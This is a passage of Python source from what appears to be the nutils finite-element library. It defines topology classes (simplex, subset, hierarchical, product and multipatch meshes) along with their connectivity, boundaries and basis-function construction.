points'.format(outofbounds.any(axis=1).sum(), len(coords)))\n xi = (coords - geom0) / scale\n ielem = numpy.minimum(numpy.maximum(xi.astype(int), 0), numpy.array(self.shape)-1)\n return self._sample(numpy.ravel_multi_index(ielem.T, self.shape), xi - ielem, weights)\n\n def __str__(self):\n 'string representation'\n\n return '{}({})'.format(self.__class__.__name__, 'x'.join(str(n) for n in self.shape))\n\nclass ConnectedTopology(Topology):\n 'unstructured topology with connectivity'\n\n __slots__ = 'connectivity',\n\n @types.apply_annotations\n def __init__(self, references:types.strict[References], transforms:transformseq.stricttransforms, opposites:transformseq.stricttransforms, connectivity):\n assert len(connectivity) == len(references) and all(len(c) == e.nedges for c, e in zip(connectivity, references))\n self.connectivity = connectivity\n super().__init__(references, transforms, opposites)\n\nclass SimplexTopology(Topology):\n 'simpex topology'\n\n __slots__ = 'simplices', 'references', 'transforms', 'opposites'\n __cache__ = 'connectivity'\n\n def _renumber(simplices):\n simplices = numpy.asarray(simplices)\n keep = numpy.zeros(simplices.max()+1, dtype=bool)\n keep[simplices.flat] = True\n return types.frozenarray(simplices if keep.all() else (numpy.cumsum(keep)-1)[simplices], copy=False)\n\n @types.apply_annotations\n def __init__(self, simplices:_renumber, transforms:transformseq.stricttransforms, opposites:transformseq.stricttransforms):\n assert simplices.shape == (len(transforms), transforms.fromdims+1)\n assert numpy.greater(simplices[:,1:], simplices[:,:-1]).all(), 'nodes should be sorted'\n assert not numpy.equal(simplices[:,1:], simplices[:,:-1]).all(), 'duplicate nodes'\n self.simplices = simplices\n references = References.uniform(element.getsimplex(transforms.fromdims), len(transforms))\n super().__init__(references, transforms, opposites)\n\n @property\n def connectivity(self):\n nverts = self.ndims + 1\n edge_vertices = numpy.arange(nverts).repeat(self.ndims).reshape(self.ndims, nverts)[:,::-1].T # nverts x ndims\n simplices_edges = self.simplices.take(edge_vertices, axis=1) # nelems x nverts x ndims\n elems, edges = divmod(numpy.lexsort(simplices_edges.reshape(-1, self.ndims).T), nverts)\n sorted_simplices_edges = simplices_edges[elems, edges] # (nelems x nverts) x ndims; matching edges are now adjacent\n i, = numpy.equal(sorted_simplices_edges[1:], sorted_simplices_edges[:-1]).all(axis=1).nonzero()\n j = i + 1\n assert numpy.greater(i[1:], j[:-1]).all(), 'single edge is shared by three or more simplices'\n connectivity = numpy.full((len(self.simplices), self.ndims+1), fill_value=-1, dtype=int)\n connectivity[elems[i],edges[i]] = elems[j]\n connectivity[elems[j],edges[j]] = elems[i]\n return types.frozenarray(connectivity, copy=False)\n\n def basis_std(self, degree):\n if degree == 1:\n coeffs = element.getsimplex(self.ndims).get_poly_coeffs('bernstein', degree=1)\n return function.PlainBasis([coeffs] * len(self), self.simplices, self.simplices.max()+1, self.f_index, self.f_coords)\n return super().basis_std(degree)\n\n def basis_bubble(self):\n 'bubble from vertices'\n\n bernstein = element.getsimplex(self.ndims).get_poly_coeffs('bernstein', degree=1)\n bubble = functools.reduce(numeric.poly_mul, bernstein)\n coeffs = numpy.zeros((len(bernstein)+1,) + bubble.shape)\n coeffs[(slice(-1),)+(slice(2),)*self.ndims] = bernstein\n coeffs[-1] = bubble\n coeffs[:-1] -= bubble / (self.ndims+1)\n coeffs = types.frozenarray(coeffs, copy=False)\n nverts = self.simplices.max() + 1\n ndofs = nverts + len(self)\n nmap = [types.frozenarray(numpy.hstack([idofs, nverts+ielem]), copy=False) for ielem, idofs in enumerate(self.simplices)]\n return function.PlainBasis([coeffs] * len(self), nmap, ndofs, self.f_index, self.f_coords)\n\nclass UnionTopology(Topology):\n 'grouped topology'\n\n __slots__ = '_topos', '_names', 'references', 'transforms', 'opposites'\n\n @types.apply_annotations\n def __init__(self, topos:types.tuple[stricttopology], names:types.tuple[types.strictstr]=()):\n self._topos = topos\n self._names = tuple(names)[:len(self._topos)]\n assert len(set(self._names)) == len(self._names), 'duplicate name'\n ndims = self._topos[0].ndims\n assert all(topo.ndims == ndims for topo in self._topos)\n\n references = []\n selections = [[] for topo in topos]\n for trans, indices in util.gather((trans, (itopo, itrans)) for itopo, topo in enumerate(self._topos) for itrans, trans in enumerate(topo.transforms)):\n itopo0, itrans0 = indices[0]\n selections[itopo0].append(itrans0)\n if len(indices) == 1:\n references.append(self._topos[itopo0].references[itrans0])\n else:\n refs = [self._topos[itopo].references[itrans] for itopo, itrans in indices]\n while len(refs) > 1: # sweep all possible unions until a single reference is left\n nrefs = len(refs)\n iref = 0\n while iref < len(refs)-1:\n for jref in range(iref+1, len(refs)):\n try:\n unionref = refs[iref] | refs[jref]\n except TypeError:\n pass\n else:\n refs[iref] = unionref\n del refs[jref]\n break\n iref += 1\n assert len(refs) < nrefs, 'incompatible elements in union'\n references.append(refs[0])\n assert len(set(self._topos[itopo].opposites[itrans] for itopo, itrans in indices)) == 1\n selections = tuple(map(types.frozenarray[int], selections))\n\n super().__init__(\n References.from_iter(references, ndims),\n transformseq.chain((topo.transforms[selection] for topo, selection in zip(topos, selections)), ndims),\n transformseq.chain((topo.opposites[selection] for topo, selection in zip(topos, selections)), ndims))\n\n def getitem(self, item):\n topos = [topo if name == item else topo.getitem(item) for topo, name in itertools.zip_longest(self._topos, self._names)]\n return functools.reduce(operator.or_, topos, EmptyTopology(self.ndims))\n\n def __or__(self, other):\n if not isinstance(other, UnionTopology):\n return UnionTopology(self._topos + (other,), self._names)\n return UnionTopology(self._topos[:len(self._names)] + other._topos + self._topos[len(self._names):], self._names + other._names)\n\n @property\n def refined(self):\n return UnionTopology([topo.refined for topo in self._topos], self._names)\n\nclass DisjointUnionTopology(Topology):\n 'grouped topology'\n\n __slots__ = '_topos', '_names'\n\n @types.apply_annotations\n def __init__(self, topos:types.tuple[stricttopology], names:types.tuple[types.strictstr]=()):\n self._topos = topos\n self._names = tuple(names)[:len(self._topos)]\n assert len(set(self._names)) == len(self._names), 'duplicate name'\n ndims = self._topos[0].ndims\n assert all(topo.ndims == ndims for topo in self._topos)\n super().__init__(\n util.sum(topo.references for topo in self._topos),\n transformseq.chain((topo.transforms for topo in self._topos), ndims),\n transformseq.chain((topo.opposites for topo in self._topos), ndims))\n\n def getitem(self, item):\n topos = [topo if name == item else topo.getitem(item) for topo, name in itertools.zip_longest(self._topos, self._names)]\n topos = [topo for topo in topos if not isinstance(topo, EmptyTopology)]\n if len(topos) == 0:\n return EmptyTopology(self.ndims)\n elif len(topos) == 1:\n return topos[0]\n else:\n return DisjointUnionTopology(topos)\n\n @property\n def refined(self):\n return DisjointUnionTopology([topo.refined for topo in self._topos], self._names)\n\nclass SubsetTopology(Topology):\n 'trimmed'\n\n __slots__ = 'refs', 'basetopo', 'newboundary', '_indices'\n __cache__ = 'connectivity', 'boundary', 'interfaces', 'refined'\n\n @types.apply_annotations\n def __init__(self, basetopo:stricttopology, refs:types.tuple[element.strictreference], newboundary=None):\n if newboundary is not None:\n assert isinstance(newboundary, str) or isinstance(newboundary, Topology) and newboundary.ndims == basetopo.ndims-1\n assert len(refs) == len(basetopo)\n self.refs = refs\n self.basetopo = basetopo\n self.newboundary = newboundary\n\n self._indices = types.frozenarray(numpy.array([i for i, ref in enumerate(self.refs) if ref], dtype=int), copy=False)\n references = References.from_iter(self.refs, self.basetopo.ndims).take(self._indices)\n transforms = self.basetopo.transforms[self._indices]\n opposites = self.basetopo.opposites[self._indices]\n super().__init__(references, transforms, opposites)\n\n def getitem(self, item):\n return self.basetopo.getitem(item).subset(self, strict=False)\n\n def __rsub__(self, other):\n if self.basetopo == other:\n refs = [baseref - ref for baseref, ref in zip(self.basetopo.references, self.refs)]\n return SubsetTopology(self.basetopo, refs, ~self.newboundary if isinstance(self.newboundary,Topology) else self.newboundary)\n return super().__rsub__(other)\n\n def __or__(self, other):\n if not isinstance(other, SubsetTopology) or self.basetopo != other.basetopo:\n return super().__or__(other)\n refs = [ref1 | ref2 for ref1, ref2 in zip(self.refs, other.refs)]\n if all(baseref == ref for baseref, ref in zip(self.basetopo.references, refs)):\n return self.basetopo\n return SubsetTopology(self.basetopo, refs) # TODO boundary\n\n @property\n def connectivity(self):\n mask = numpy.array([bool(ref) for ref in self.refs] + [False]) # trailing false serves to map -1 to -1\n renumber = numpy.cumsum(mask)-1\n renumber[~mask] = -1\n return tuple(types.frozenarray(renumber.take(ioppelems).tolist() + [-1] * (ref.nedges - len(ioppelems))) for ref, ioppelems in zip(self.refs, self.basetopo.connectivity) if ref)\n\n @property\n def refined(self):\n child_refs = self.references.children\n indices = types.frozenarray(numpy.array([i for i, ref in enumerate(child_refs) if ref], dtype=int), copy=False)\n refined_transforms = self.transforms.refined(self.references)[indices]\n self_refined = Topology(child_refs[indices], refined_transforms, refined_transforms)\n return self.basetopo.refined.subset(self_refined, self.newboundary.refined if isinstance(self.newboundary,Topology) else self.newboundary, strict=True)\n\n @property\n def boundary(self):\n baseboundary = self.basetopo.boundary\n baseconnectivity = self.basetopo.connectivity\n brefs = [ref.empty for ref in baseboundary.references]\n trimmedreferences = []\n trimmedtransforms = []\n trimmedopposites = []\n for ielem, newref in enumerate(self.refs):\n if not newref:\n continue\n elemtrans = self.basetopo.transforms[ielem]\n # The first edges of newref by convention share location with the edges\n # of the original reference. We can therefore use baseconnectivity to\n # locate opposing edges.\n ioppelems = baseconnectivity[ielem]\n for (edgetrans, edgeref), ioppelem in zip(newref.edges, ioppelems):\n if not edgeref:\n continue\n if ioppelem == -1:\n # If the edge had no opposite in basetopology then it must already by\n # in baseboundary, so we can use index to locate it.\n brefs[baseboundary.transforms.index(elemtrans+(edgetrans,))] = edgeref\n else:\n # If the edge did have an opposite in basetopology then there is a\n # possibility this opposite (partially) disappeared, in which case\n # the exposed part is added to the trimmed group.\n ioppedge = baseconnectivity[ioppelem].index(ielem)\n oppref = self.refs[ioppelem]\n edgeref -= oppref.edge_refs[ioppedge]\n if edgeref:\n trimmedreferences.append(edgeref)\n trimmedtransforms.append(elemtrans+(edgetrans,))\n trimmedopposites.append(self.basetopo.transforms[ioppelem]+(oppref.edge_transforms[ioppedge],))\n # The last edges of newref (beyond the number of edges of the original)\n # cannot have opposites and are added to the trimmed group directly.\n for edgetrans, edgeref in newref.edges[len(ioppelems):]:\n trimmedreferences.append(edgeref)\n trimmedtransforms.append(elemtrans+(edgetrans,))\n trimmedopposites.append(elemtrans+(edgetrans.flipped,))\n origboundary = SubsetTopology(baseboundary, brefs)\n if isinstance(self.newboundary, Topology):\n trimmedbrefs = [ref.empty for ref in self.newboundary.references]\n for ref, trans in zip(trimmedreferences, trimmedtransforms):\n trimmedbrefs[self.newboundary.transforms.index(trans)] = ref\n trimboundary = SubsetTopology(self.newboundary, trimmedbrefs)\n else:\n trimboundary = Topology(References.from_iter(trimmedreferences, self.ndims-1), transformseq.PlainTransforms(trimmedtransforms, self.ndims-1), transformseq.PlainTransforms(trimmedopposites, self.ndims-1))\n return DisjointUnionTopology([trimboundary, origboundary], names=[self.newboundary] if isinstance(self.newboundary,str) else [])\n\n @property\n def interfaces(self):\n baseinterfaces = self.basetopo.interfaces\n superinterfaces = super().interfaces\n irefs = [ref.empty for ref in baseinterfaces.references]\n for ref, trans, opp in zip(superinterfaces.references, superinterfaces.transforms, superinterfaces.opposites):\n try:\n iielem = baseinterfaces.transforms.index(trans)\n except ValueError:\n iielem = baseinterfaces.transforms.index(opp)\n irefs[iielem] = ref\n return SubsetTopology(baseinterfaces, irefs)\n\n @log.withcontext\n def basis(self, name, *args, **kwargs):\n if isinstance(self.basetopo, HierarchicalTopology):\n warnings.warn('basis may be linearly dependent; a linearly indepent basis is obtained by trimming first, then creating hierarchical refinements')\n basis = self.basetopo.basis(name, *args, **kwargs)\n return function.PrunedBasis(basis, self._indices, self.f_index, self.f_coords)\n\n def locate(self, geom, coords, *, eps=0, **kwargs):\n sample = self.basetopo.locate(geom, coords, eps=eps, **kwargs)\n for isampleelem, (transforms, points) in enumerate(zip(sample.transforms[0], sample.points)):\n ielem = self.basetopo.transforms.index(transforms)\n ref = self.refs[ielem]\n if ref != self.basetopo.references[ielem]:\n for i, coord in enumerate(points.coords):\n if not ref.inside(coord, eps):\n raise LocateError('failed to locate point: {}'.format(coords[sample.getindex(isampleelem)[i]]))\n return sample\n\nclass RefinedTopology(Topology):\n 'refinement'\n\n __slots__ = 'basetopo',\n __cache__ = 'boundary', 'connectivity'\n\n @types.apply_annotations\n def __init__(self, basetopo:stricttopology):\n self.basetopo = basetopo\n super().__init__(\n self.basetopo.references.children,\n self.basetopo.transforms.refined(self.basetopo.references),\n self.basetopo.opposites.refined(self.basetopo.references))\n\n def getitem(self, item):\n return self.basetopo.getitem(item).refined\n\n @property\n def boundary(self):\n return self.basetopo.boundary.refined\n\n @property\n def connectivity(self):\n offsets = numpy.cumsum([0] + [ref.nchildren for ref in self.basetopo.references])\n connectivity = [offset + edges for offset, ref in zip(offsets, self.basetopo.references) for edges in ref.connectivity]\n for ielem, edges in enumerate(self.basetopo.connectivity):\n for iedge, jelem in enumerate(edges):\n if jelem == -1:\n for ichild, ichildedge in self.basetopo.references[ielem].edgechildren[iedge]:\n connectivity[offsets[ielem]+ichild][ichildedge] = -1\n elif jelem < ielem:\n jedge = self.basetopo.connectivity[jelem].index(ielem)\n for (ichild, ichildedge), (jchild, jchildedge) in zip(self.basetopo.references[ielem].edgechildren[iedge], self.basetopo.references[jelem].edgechildren[jedge]):\n connectivity[offsets[ielem]+ichild][ichildedge] = offsets[jelem]+jchild\n connectivity[offsets[jelem]+jchild][jchildedge] = offsets[ielem]+ichild\n return tuple(types.frozenarray(c, copy=False) for c in connectivity)\n\nclass HierarchicalTopology(Topology):\n 'collection of nested topology elments'\n\n __slots__ = 'basetopo', 'levels', '_indices_per_level', '_offsets'\n __cache__ = 'refined', 'boundary', 'interfaces'\n\n @types.apply_annotations\n def __init__(self, basetopo:stricttopology, indices_per_level:types.tuple[types.frozenarray[types.strictint]]):\n 'constructor'\n\n assert not isinstance(basetopo, HierarchicalTopology)\n self.basetopo = basetopo\n self._indices_per_level = indices_per_level\n self._offsets = numpy.cumsum([0, *map(len, self._indices_per_level)], dtype=int)\n\n level = None\n levels = []\n references = References.empty(basetopo.ndims)\n transforms = []\n opposites = []\n for indices in indices_per_level:\n level = self.basetopo if level is None else level.refined\n levels.append(level)\n if len(indices):\n references = references.chain(level.references.take(indices))\n transforms.append(level.transforms[indices])\n opposites.append(level.opposites[indices])\n self.levels = tuple(levels)\n\n super().__init__(references, transformseq.chain(transforms, basetopo.ndims), transformseq.chain(opposites, basetopo.ndims))\n\n def __and__(self, other):\n if not isinstance(other, HierarchicalTopology) or self.basetopo != other.basetopo:\n return super().__and__(other)\n indices_per_level = []\n levels = max(self.levels, other.levels, key=len)\n for level, self_indices, other_indices in itertools.zip_longest(levels, self._indices_per_level, other._indices_per_level, fillvalue=()):\n keep = numpy.zeros(len(level), dtype=bool)\n for topo, topo_indices, indices in (other, other_indices, self_indices), (self, self_indices, other_indices):\n mask = numeric.asboolean(topo_indices, len(level))\n for index in indices: # keep common elements or elements which are finer than conterpart\n keep[index] = mask[index] or topo.transforms.contains_with_tail(level.transforms[index])\n indices, = keep.nonzero()\n indices_per_level.append(indices)\n return HierarchicalTopology(self.basetopo, indices_per_level)\n\n def getitem(self, item):\n itemtopo = self.basetopo.getitem(item)\n itemindices_per_level = []\n for baseindices, baselevel, itemlevel in zip(self._indices_per_level, self.basetopo.refine_iter, itemtopo.refine_iter):\n itemindices = []\n itemindex = itemlevel.transforms.index\n for basetrans in map(baselevel.transforms.__getitem__, baseindices):\n try:\n itemindices.append(itemindex(basetrans))\n except ValueError:\n pass\n itemindices_per_level.append(numpy.unique(numpy.array(itemindices, dtype=int)))\n return HierarchicalTopology(itemtopo, itemindices_per_level)\n\n def refined_by(self, refine):\n refine = tuple(refine)\n if not all(map(numeric.isint, refine)):\n refine = tuple(self.transforms.index_with_tail(item)[0] for item in refine)\n refine = numpy.unique(numpy.array(refine, dtype=int))\n splits = numpy.searchsorted(refine, self._offsets, side='left')\n indices_per_level = list(map(list, self._indices_per_level))+[[]]\n fine = self.basetopo\n for ilevel, (start, stop) in enumerate(zip(splits[:-1], splits[1:])):\n coarse, fine = fine, fine.refined\n coarse_indices = tuple(map(indices_per_level[ilevel].pop, reversed(refine[start:stop]-self._offsets[ilevel])))\n coarse_transforms = map(coarse.transforms.__getitem__, coarse_indices)\n coarse_references = map(coarse.references.__getitem__, coarse_indices)\n fine_transforms = (trans+(ctrans,) for trans, ref in zip(coarse_transforms, coarse_references) for ctrans, cref in ref.children if cref)\n indices_per_level[ilevel+1].extend(map(fine.transforms.index, fine_transforms))\n if not indices_per_level[-1]:\n indices_per_level.pop(-1)\n return HierarchicalTopology(self.basetopo, ([numpy.unique(numpy.array(i, dtype=int)) for i in indices_per_level]))\n\n @property\n def refined(self):\n refined_indices_per_level = [[]]\n fine = self.basetopo\n for coarse_indices in self._indices_per_level:\n coarse, fine = fine, fine.refined\n coarse_transforms = map(coarse.transforms.__getitem__, coarse_indices)\n coarse_references = map(coarse.references.__getitem__, coarse_indices)\n fine_transforms = (trans+(ctrans,) for trans, ref in zip(coarse_transforms, coarse_references) for ctrans, cref in ref.children if cref)\n refined_indices_per_level.append(numpy.unique(numpy.fromiter(map(fine.transforms.index, fine_transforms), dtype=int)))\n return HierarchicalTopology(self.basetopo, refined_indices_per_level)\n\n @property\n @log.withcontext\n def boundary(self):\n 'boundary elements'\n\n basebtopo = self.basetopo.boundary\n bindices_per_level = []\n for indices, level, blevel in zip(self._indices_per_level, self.basetopo.refine_iter, basebtopo.refine_iter):\n bindex = blevel.transforms.index\n bindices = []\n for index in indices:\n for etrans, eref in level.references[index].edges:\n if eref:\n trans = level.transforms[index]+(etrans,)\n try:\n bindices.append(bindex(trans))\n except ValueError:\n pass\n bindices = numpy.array(bindices, dtype=int)\n if len(bindices) > 1:\n bindices.sort()\n assert not numpy.equal(bindices[1:], bindices[:-1]).any()\n bindices_per_level.append(bindices)\n return HierarchicalTopology(basebtopo, bindices_per_level)\n\n @property\n @log.withcontext\n def interfaces(self):\n 'interfaces'\n\n hreferences = References.empty(self.ndims-1)\n htransforms = []\n hopposites = []\n for level, indices in zip(self.levels, self._indices_per_level):\n selection = []\n to = level.interfaces.transforms, level.interfaces.opposites\n for trans, ref in zip(map(level.transforms.__getitem__, indices), map(level.references.__getitem__, indices)):\n for etrans, eref in ref.edges:\n if not eref:\n continue\n for transforms, opposites in to, to[::-1]:\n try:\n i = transforms.index(trans+(etrans,))\n except ValueError:\n continue\n if self.transforms.contains_with_tail(opposites[i]):\n selection.append(i)\n break\n if selection:\n selection = types.frozenarray(numpy.unique(selection))\n hreferences = hreferences.chain(level.interfaces.references.take(selection))\n htransforms.append(level.interfaces.transforms[selection])\n hopposites.append(level.interfaces.opposites[selection])\n return Topology(hreferences, transformseq.chain(htransforms, self.ndims-1), transformseq.chain(hopposites, self.ndims-1))\n\n @log.withcontext\n def basis(self, name, *args, truncation_tolerance=1e-15, **kwargs):\n '''Create hierarchical basis.\n\n A hierarchical basis is constructed from bases on different levels of\n uniform refinement. Two different types of hierarchical bases are\n supported:\n\n 1. Classical -- Starting from the set of all basis functions originating\n from all levels of uniform refinement, only those basis functions are\n selected for which at least one supporting element is part of the\n hierarchical topology.\n\n 2. Truncated -- Like classical, but with basis functions modified such that\n the area of support is reduced. An additional effect of this procedure is\n that it restores partition of unity. The spanned function space remains\n unchanged.\n\n Truncation is based on linear combinations of basis functions, where fine\n level basis functions are used to reduce the support of coarser level basis\n functions. See `Giannelli et al. 2012`_ for more information on truncated\n hierarchical refinement.\n\n .. _`Giannelli et al. 2012`: https://pdfs.semanticscholar.org/a858/aa68da617ad9d41de021f6807cc422002258.pdf\n\n Args\n ----\n name : :class:`str`\n Type of basis function as provided by the base topology, with prefix\n ``h-`` (``h-std``, ``h-spline``) for a classical hierarchical basis and\n prefix ``th-`` (``th-std``, ``th-spline``) for a truncated hierarchical\n basis.\n truncation_tolerance : :class:`float` (default 1e-15)\n In order to benefit from the extra sparsity resulting from truncation,\n vanishing polynomials need to be actively identified and removed from the\n basis. The ``trunctation_tolerance`` offers control over this threshold.\n\n Returns\n -------\n basis : :class:`nutils.function.Array`\n '''\n\n if name.startswith('h-'):\n truncated = False\n name = name[2:]\n elif name.startswith('th-'):\n truncated = True\n name = name[3:]\n else:\n return super().basis(name, *args, **kwargs)\n\n # 1. identify active (supported) and passive (unsupported) basis functions\n ubases = []\n ubasis_active = []\n ubasis_passive = []\n prev_transforms = None\n prev_ielems = []\n map_indices = []\n with log.iter.fraction('level', self.levels[::-1], self._indices_per_level[::-1]) as items:\n for topo, touchielems_i in items:\n\n topo_index_with_tail = topo.transforms.index_with_tail\n mapped_prev_ielems = [topo_index_with_tail(prev_transforms[j])[0] for j in prev_ielems]\n map_indices.insert(0, dict(zip(prev_ielems, mapped_prev_ielems)))\n nontouchielems_i = numpy.unique(numpy.array(mapped_prev_ielems, dtype=int))\n prev_ielems = ielems_i = numpy.unique(numpy.concatenate([numpy.asarray(touchielems_i, dtype=int), nontouchielems_i], axis=0))\n prev_transforms = topo.transforms\n\n basis_i = topo.basis(name, *args, **kwargs)\n assert isinstance(basis_i, function.Basis)\n ubases.insert(0, basis_i)\n # Basis functions that have at least one touchelem in their support.\n touchdofs_i = basis_i.get_dofs(touchielems_i)\n # Basis functions with (partial) support in this hierarchical topology.\n partsuppdofs_i = numpy.union1d(touchdofs_i, basis_i.get_dofs(numpy.setdiff1d(ielems_i, touchielems_i, assume_unique=True)))\n # Mask of basis functions in `partsuppdofs_i` with strict support in this hierarchical topology.\n partsuppdofs_supported_i = numpy.array([numeric.sorted_contains(ielems_i, basis_i.get_support(dof)).all() for dof in partsuppdofs_i], dtype=bool)\n ubasis_active.insert(0, numpy.intersect1d(touchdofs_i, partsuppdofs_i[partsuppdofs_supported_i], assume_unique=True))\n ubasis_passive.insert(0, partsuppdofs_i[~partsuppdofs_supported_i])\n\n *offsets, ndofs = numpy.cumsum([0, *map(len, ubasis_active)])\n\n # 2. construct hierarchical polynomials\n hbasis_dofs = []\n hbasis_coeffs = []\n projectcache = {}\n\n for ilevel, (level, indices) in enumerate(zip(self.levels, self._indices_per_level)):\n for ilocal in indices:\n\n hbasis_trans = transform.canonical(level.transforms[ilocal])\n tail = hbasis_trans[len(hbasis_trans)-ilevel:]\n trans_dofs = []\n trans_coeffs = []\n\n local_indices = [ilocal]\n for m in reversed(map_indices[:ilevel]):\n ilocal = m[ilocal]\n local_indices.insert(0, ilocal)\n\n if not truncated: # classical hierarchical basis\n\n for h, ilocal in enumerate(local_indices): # loop from coarse to fine\n mydofs = ubases[h].get_dofs(ilocal)\n\n imyactive = numeric.sorted_index(ubasis_active[h], mydofs, missing=-1)\n myactive = numpy.greater_equal(imyactive, 0)\n if myactive.any():\n trans_dofs.append(offsets[h]+imyactive[myactive])\n mypoly = ubases[h].get_coefficients(ilocal)\n trans_coeffs.append(mypoly[myactive])\n\n if h < len(tail):\n trans_coeffs = [tail[h].transform_poly(c) for c in trans_coeffs]\n\n else: # truncated hierarchical basis\n\n for h, ilocal in reversed(tuple(enumerate(local_indices))): # loop from fine to coarse\n mydofs = ubases[h].get_dofs(ilocal)\n mypoly = ubases[h].get_coefficients(ilocal)\n\n truncpoly = mypoly if h == len(tail) \\\n else numpy.tensordot(numpy.tensordot(tail[h].transform_poly(mypoly), project[...,mypassive], self.ndims), truncpoly[mypassive], 1)\n\n imyactive = numeric.sorted_index(ubasis_active[h], mydofs, missing=-1)\n myactive = numpy.greater_equal(imyactive, 0) & numpy.greater(abs(truncpoly), truncation_tolerance).any(axis=tuple(range(1,truncpoly.ndim)))\n if myactive.any():\n trans_dofs.append(offsets[h]+imyactive[myactive])\n trans_coeffs.append(truncpoly[myactive])\n\n mypassive = numeric.sorted_contains(ubasis_passive[h], mydofs)\n if not mypassive.any():\n break\n\n try: # construct least-squares projection matrix\n project = projectcache[mypoly]\n except KeyError:\n P = mypoly.reshape(len(mypoly), -1)\n U, S, V = numpy.linalg.svd(P) # (U * S).dot(V[:len(S)]) == P\n project = (V.T[:,:len(S)] / S).dot(U.T).reshape(mypoly.shape[1:]+mypoly.shape[:1])\n projectcache[mypoly] = project\n\n # add the dofs and coefficients to the hierarchical basis\n hbasis_dofs.append(numpy.concatenate(trans_dofs))\n hbasis_coeffs.append(numeric.poly_concatenate(tuple(trans_coeffs)))\n\n return function.PlainBasis(hbasis_coeffs, hbasis_dofs, ndofs, self.f_index, self.f_coords)\n\nclass ProductTopology(Topology):\n 'product topology'\n\n __slots__ = 'topo1', 'topo2'\n __cache__ = 'boundary', 'interfaces'\n\n @types.apply_annotations\n def __init__(self, topo1:stricttopology, topo2:stricttopology):\n assert not isinstance(topo1, ProductTopology)\n self.topo1 = topo1\n self.topo2 = topo2\n references = self.topo1.references * self.topo2.references\n transforms = transformseq.ProductTransforms(self.topo1.transforms, self.topo2.transforms)\n if (self.topo1.opposites != self.topo1.transforms) != (self.topo2.opposites != self.topo2.transforms):\n opposites = transformseq.ProductTransforms(self.topo1.opposites, self.topo2.opposites)\n else:\n opposites = transforms\n super().__init__(references, transforms, opposites)\n\n def __mul__(self, other):\n return ProductTopology(self.topo1, self.topo2 * other)\n\n @property\n def refined(self):\n return self.topo1.refined * self.topo2.refined\n\n def refine(self, n):\n if numpy.iterable(n):\n assert len(n) == self.ndims\n else:\n n = (n,)*self.ndims\n return self.topo1.refine(n[:self.topo1.ndims]) * self.topo2.refine(n[self.topo1.ndims:])\n\n def getitem(self, item):\n return self.topo1.getitem(item) * self.topo2 | self.topo1 * self.topo2.getitem(item) if isinstance(item, str) \\\n else self.topo1[item[:self.topo1.ndims]] * self.topo2[item[self.topo1.ndims:]]\n\n def basis(self, name, *args, **kwargs):\n def _split(arg):\n if not numpy.iterable(arg):\n return arg, arg\n assert len(arg) == self.ndims\n return tuple(a[0] if all(ai == a[0] for ai in a[1:]) else a for a in (arg[:self.topo1.ndims], arg[self.topo1.ndims:]))\n splitargs = [_split(arg) for arg in args]\n splitkwargs = [(name,)+_split(arg) for name, arg in kwargs.items()]\n basis1, basis2 = function.bifurcate(\n self.topo1.basis(name, *[arg1 for arg1, arg2 in splitargs], **{name: arg1 for name, arg1, arg2 in splitkwargs}),\n self.topo2.basis(name, *[arg2 for arg1, arg2 in splitargs], **{name: arg2 for name, arg1, arg2 in splitkwargs}))\n return function.ravel(function.outer(basis1,basis2), axis=0)\n\n @property\n def boundary(self):\n return self.topo1 * self.topo2.boundary + self.topo1.boundary * self.topo2\n\n @property\n def interfaces(self):\n return self.topo1 * self.topo2.interfaces + self.topo1.interfaces * self.topo2\n\nclass RevolutionTopology(Topology):\n 'topology consisting of a single revolution element'\n\n __slots__ = 'boundary', '_root'\n\n connectivity = numpy.empty([1,0], dtype=int)\n\n def __init__(self):\n self._root = transform.Identifier(1, 'angle')\n self.boundary = EmptyTopology(ndims=0)\n transforms = transformseq.PlainTransforms([(self._root,)], 1)\n references = References.uniform(element.RevolutionReference(), 1)\n super().__init__(references, transforms, transforms)\n\n @property\n def refined(self):\n return self\n\n def basis(self, name, *args, **kwargs):\n return function.asarray([1.])\n\nclass PatchBoundary(types.Singleton):\n\n __slots__ = 'id', 'dim', 'side', 'reverse', 'transpose'\n\n @types.apply_annotations\n def __init__(self, id:types.tuple[types.strictint], dim, side, reverse:types.tuple[bool], transpose:types.tuple[types.strictint]):\n super().__init__()\n self.id = id\n self.dim = dim\n self.side = side\n self.reverse = reverse\n self.transpose = transpose\n\n def apply_transform(self, array):\n return array[tuple(slice(None, None, -1) if i else slice(None) for i in self.reverse)].transpose(self.transpose)\n\nclass Patch(types.Singleton):\n\n __slots__ = 'topo', 'verts', 'boundaries'\n\n @types.apply_annotations\n def __init__(self, topo:stricttopology, verts:types.frozenarray, boundaries:types.tuple[types.strict[PatchBoundary]]):\n super().__init__()\n self.topo = topo\n self.verts = verts\n self.boundaries = boundaries\n\nclass MultipatchTopology(Topology):\n 'multipatch topology'\n\n __slots__ = 'patches',\n __cache__ = '_patchinterfaces', 'boundary', 'interfaces', 'refined', 'connectivity'\n\n @staticmethod\n def build_boundarydata(connectivity):\n 'build boundary data based on connectivity'\n\n boundarydata = []\n for patch in connectivity:\n ndims = len(patch.shape)\n patchboundarydata = []\n for dim, side in itertools.product(range(ndims), [-1, 0]):\n # ignore vertices at opposite face\n verts = numpy.array(patch)\n opposite = tuple({0:-1, -1:0}[side] if i == dim else slice(None) for i in range(ndims))\n verts[opposite] = verts.max()+1\n if len(set(verts.flat)) != 2**(ndims-1)+1:\n raise NotImplementedError('Cannot compute canonical boundary if vertices are used more than once.')\n # reverse axes such that lowest vertex index is at first position\n reverse = tuple(map(bool, numpy.unravel_index(verts.argmin(), verts.shape)))\n verts = verts[tuple(slice(None, None, -1) if i else slice(None) for i in reverse)]\n # transpose such that second lowest vertex connects to lowest vertex in first dimension, third in second dimension, et cetera\n k = [verts[tuple(1 if i == j else 0 for j in range(ndims))] for i in range(ndims)]\n transpose = tuple(sorted(range(ndims), key=k.__getitem__))\n verts = verts.transpose(transpose)\n # boundarid\n boundaryid = tuple(verts[...,0].flat)\n patchboundarydata.append(PatchBoundary(boundaryid,dim,side,reverse,transpose))\n boundarydata.append(tuple(patchboundarydata))\n\n return boundarydata\n\n @types.apply_annotations\n def __init__(self, patches:types.tuple[types.strict[Patch]]):\n 'constructor'\n\n self.patches = patches\n\n for boundaryid, patchdata in self._patchinterfaces.items():\n if len(patchdata) == 1:\n continue\n transposes = set()\n reverses = set()\n for topo, boundary in patchdata:\n assert boundary.transpose[-1] == boundary.dim\n transposes.add(tuple(i-1 if i > boundary.dim else i for i in boundary.transpose[:-1]))\n reverses.add(boundary.reverse[:boundary.dim]+boundary.reverse[boundary.dim+1:])\n if 